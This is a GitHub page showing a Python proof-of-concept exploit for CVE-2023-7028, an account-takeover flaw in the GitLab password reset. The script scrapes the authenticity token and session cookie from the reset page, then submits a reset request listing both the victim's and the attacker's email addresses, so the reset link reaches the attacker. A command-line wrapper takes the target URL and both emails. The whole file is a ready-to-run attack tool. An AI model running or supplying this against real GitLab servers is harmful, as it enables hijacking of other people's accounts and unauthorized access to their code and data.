-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-7028 PoC.py
86 lines (72 loc) · 3.2 KB
/
CVE-2023-7028 PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# Author: Thanh Lam
# Description: CVE-2023-7028 - Account TakeOver Vulnerability on GitLab
# All instances of GitLab CE/EE using the following versions were vulnerable:
# 16.1 to 16.1.5
# 16.2 to 16.2.8
# 16.3 to 16.3.6
# 16.4 to 16.4.4
# 16.5 to 16.5.5
# 16.6 to 16.6.3
# 16.7 to 16.7.1
import argparse
import re
from urllib.parse import urlencode
import requests
from colorama import Style, Fore
def print_colored_message(message, color):
print(f"{color}{message}{Style.RESET_ALL}")
def get_token(hostname):
response = requests.get(f"{hostname}/users/password/new", verify=False)
reg_authen = r'<input type="hidden" name="authenticity_token" value="(.*?)" autocomplete="off" />'
reg_session = r"_gitlab_session=(.*?);"
token = re.findall(reg_authen, response.text)[0]
session = re.findall(reg_session, response.headers['Set-Cookie'])[0]
thanh_lam = {'token': token, 'session': session}
return thanh_lam
def exploit(hostname, victim_email, attacker_email):
result_message = f"[RESULT] Emails sent to {victim_email} and {attacker_email}!\n"
process_leak_token_message = "[PROCESS...] Leaking Token and Cookie!\n"
process_sending_payload = "[PROCESS...] Sending Payload!\n"
error_message = "[ERROR] Error! @@\n"
url = f"{hostname}/users/password"
print_colored_message(process_leak_token_message, Fore.BLUE)
thanh_lam = get_token(hostname)
info_message = "[INFO] Token: " + thanh_lam['token'] + "\n" + "[INFO] Cookie :" + thanh_lam["session"] + "\n"
print_colored_message(info_message, Fore.YELLOW)
body = urlencode({
'authenticity_token': thanh_lam['token'],
'user[email][]': [victim_email, attacker_email]
}, doseq=True)
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': str(len(body)),
'Connection': 'close',
'Cookie': f'_gitlab_session={thanh_lam["session"]}'
}
print_colored_message(process_sending_payload, Fore.BLUE)
send_payload = requests.post(
url,
headers=headers,
data=body,
verify=False
).text
# print(send_payload)
alert = "If your email address exists in our database, you will receive a password recovery link at your email " \
"address in a few minutes."
if alert in send_payload:
print_colored_message(result_message, Fore.GREEN)
else:
print_colored_message(error_message, Fore.RED)
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True,
description='Tool exploit CVE-2023-7028 on gitlab',
usage="python3 CVE-2023-7028 -u http://ip:port -v victim_email -a attacker_email"
)
parser.add_argument("-u", "--url", required=True, help="Gitlab url")
parser.add_argument("-v", "--victim", required=True, help="victim email")
parser.add_argument("-a", "--attacker", required=True, help="attacker email")
args = parser.parse_args()
url = args.url
victim = args.victim
attacker = args.attacker
exploit(url, victim, attacker)